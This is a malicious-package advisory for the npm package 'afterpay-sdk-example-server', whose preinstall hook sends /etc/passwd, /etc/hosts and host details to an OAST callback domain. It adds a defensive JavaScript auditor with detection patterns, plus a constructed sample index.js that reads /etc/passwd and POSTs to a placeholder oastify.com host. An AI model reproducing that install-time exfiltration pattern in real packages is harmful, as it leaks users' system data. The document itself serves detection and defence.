MAL-2023-1111
Malicious code in afterpay-sdk-example-server (npm)
Details
## Source: amazon-inspector (a81a53b70f9ae2610148f223507c5427bea5a52160b7f8ba214a0c3ac0fe96f7)

package.json declares a preinstall hook ("preinstall": "node index.js") that runs automatically on npm install. index.js requires os/fs/https, then collects host identifiers and installer-side files — __dirname, os.homedir(), os.hostname(), os.userInfo(), DNS servers, the full contents of /etc/passwd and /etc/hosts, and the package.json — and POSTs them over HTTPS to xqrangwae3pk5bd12xbr6t8q9hfc32rr.oastify.com (a Burp Collaborator OAST subdomain). The package name 'afterpay-sdk-example-server' impersonates an internal Afterpay SDK example, consistent with a dependency-confusion payload targeting Afterpay's internal build systems. Whether published as research or as an attack, any installer running npm install leaks system account data and host fingerprints to an attacker-controlled out-of-band collection endpoint.
## Source: ossf-package-analysis (555a159aa3b74ea73f8574c05e14aa536948cbe56b0420bcdcc0daa2a911ae2c)

The OpenSSF Package Analysis project identified 'afterpay-sdk-example-server' @ 20.0.0 (npm) as malicious.

It is considered malicious because:

- The package communicates with a domain associated with malicious activity.
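The two sources above describe the same pattern from different angles: an install-time lifecycle hook (amazon-inspector) and a callback to an OAST domain (ossf-package-analysis). The following is an added defender-side example, not code from the advisory or from the package, that audits a package's package.json and bundled scripts for exactly those indicators before anything is installed. The package contents, the `auditPackage` function and the `placeholder.oastify.com` domain are constructed for this example.

```javascript
// Added example: static pre-install audit of an npm package, flagging the pattern in
// the advisory (lifecycle hook -> host/account file reads -> OAST callback).
// All input is constructed inline; nothing here touches the network or the filesystem.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
// Out-of-band (OAST) callback domains; oastify.com is the one named in the advisory.
const OAST_DOMAINS = /\b[a-z0-9-]+\.(oastify\.com|burpcollaborator\.net)\b/i;
// Source-level indicators of host fingerprinting and account-file reads.
const INDICATORS = [
  { id: 'reads-etc-passwd', re: /\/etc\/passwd/ },
  { id: 'reads-etc-hosts', re: /\/etc\/hosts/ },
  { id: 'host-fingerprint', re: /os\.(hostname|userInfo|homedir|networkInterfaces)\s*\(/ },
  { id: 'https-post', re: /method\s*:\s*['"]POST['"]/i },
];

// pkg: parsed package.json; files: map of shipped file name -> source text.
// Returns a list of findings; an empty list means no install-time risk indicator was seen.
function auditPackage(pkg, files) {
  const findings = [];
  const scripts = pkg.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (!scripts[hook]) continue;
    findings.push({ kind: 'lifecycle-hook', hook, cmd: scripts[hook] });
    // Resolve "node <file>" to the script it runs, if that file ships with the package.
    const m = /^node\s+(\S+)/.exec(scripts[hook].trim());
    const src = m && files[m[1]];
    if (!src) continue;
    for (const ind of INDICATORS) {
      if (ind.re.test(src)) findings.push({ kind: ind.id, hook, file: m[1] });
    }
    const dom = OAST_DOMAINS.exec(src);
    if (dom) findings.push({ kind: 'oast-domain', hook, file: m[1], domain: dom[0] });
  }
  return findings;
}

// Constructed sample shaped like the advisory's description; the domain is a placeholder.
const SUSPICIOUS = {
  pkg: { name: 'example-pkg', version: '0.0.0', scripts: { preinstall: 'node index.js' } },
  files: {
    'index.js': [
      "const os = require('os'), fs = require('fs'), https = require('https');",
      "const info = { host: os.hostname(), passwd: fs.readFileSync('/etc/passwd', 'utf8') };",
      "https.request({ host: 'placeholder.oastify.com', method: 'POST' });",
    ].join('\n'),
  },
};
// Constructed benign package: a test script is not a lifecycle hook and is ignored.
const BENIGN = { pkg: { name: 'ok-pkg', version: '1.0.0', scripts: { test: 'node t.js' } }, files: {} };
```

Running `auditPackage(SUSPICIOUS.pkg, SUSPICIOUS.files)` yields five findings (hook, /etc/passwd read, host fingerprint, HTTPS POST, OAST domain), while the benign package yields none; a CI gate can fail the build on any `lifecycle-hook` finding combined with an `oast-domain` hit.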
Affected packages
No fixed version published yet for afterpay-sdk-example-server (npm). Pin to a known-safe version or switch to an alternative.